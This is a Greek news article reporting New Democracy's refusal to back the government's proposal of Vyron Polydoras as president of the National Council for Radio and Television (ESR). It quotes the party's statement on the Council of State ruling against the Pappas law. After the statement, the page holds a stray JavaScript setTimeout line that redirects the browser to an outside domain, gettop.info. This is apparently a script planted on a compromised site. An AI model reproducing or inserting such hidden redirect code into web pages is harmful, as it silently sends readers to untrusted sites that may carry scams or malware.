«Όχι» από τη ΝΔ για Πολύδωρα στο ΕΣΡ: Δεν πληροί τις προϋποθέσεις που ο θεσμός απαιτεί

0
6

 

Άμεσο και κάθετο ήταν το «όχι» που απάντησε η Νέα Δημοκρατία στην πρόταση της κυβέρνησης για τοποθέτηση του Βύρωνα Πολύδωρα στη θέση του Προέδρου του ΕΣΡ, επιδιώκοντας την συναίνεση της αξιωματικής αντιπολίτευσης.
Με μια καυστική ανακοίνωση η ΝΔ, απάντησε ότι το πρόσωπο του κ.Πολ΄θδωρα δεν πληροί τις προϋποθέσεις που ο θεσμός απαιτεί, ξεκαθαρίζοντας ότι δεν θα συναινέσει στη συγκεκριμένη πρόταση.

Αναλυτικά η ανακοίνωση της Νέας Δημοκρατίας αναφέρει:

«Η Κυβέρνηση, εγκλωβισμένη στα αδιέξοδα που η ίδια δημιούργησε, δείχνει ότι βρίσκεται σε απελπισία. Οφείλει να προσαρμοστεί στην απόφαση του Συμβουλίου της Επικρατείας που έκρινε αντισυνταγματικό το νόμο Παππά, αντί να παίζει επικοινωνιακά παιχνίδια.

Η απόφαση του Συμβουλίου της Επικρατείας δεν αφορούσε στα πρόσωπα που συνθέτουν το Ε.Σ.Ρ., αλλά στην αντισυνταγματική μεταφορά αρμοδιοτήτων από το Ε.Σ.Ρ. στον κ. Παππά.

Απαιτείται αμέσως νομοθετική ρύθμιση, την οποία η Νέα Δημοκρατία θα καταθέσει άμεσα στη Βουλή, για να επιστραφούν στο Εθνικό Συμβούλιο Ραδιοτηλεόρασης οι αρμοδιότητες που προβλέπει το Σύνταγμα.

Η στελέχωση του Ε.Σ.Ρ. με πρόσωπα εγνωσμένου κύρους θα ακολουθήσει αμέσως μετά.

Σε κάθε περίπτωση, όλοι γνωρίζουν, ότι το πρόσωπο του κ. Βύρωνα Πολύδωρα, που προτείνεται από τον κ. Τσίπρα για την προεδρία του Εθνικού Συμβουλίου Ραδιοτηλεόρασης, δεν πληροί τις προϋποθέσεις που ο θεσμός απαιτεί».

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here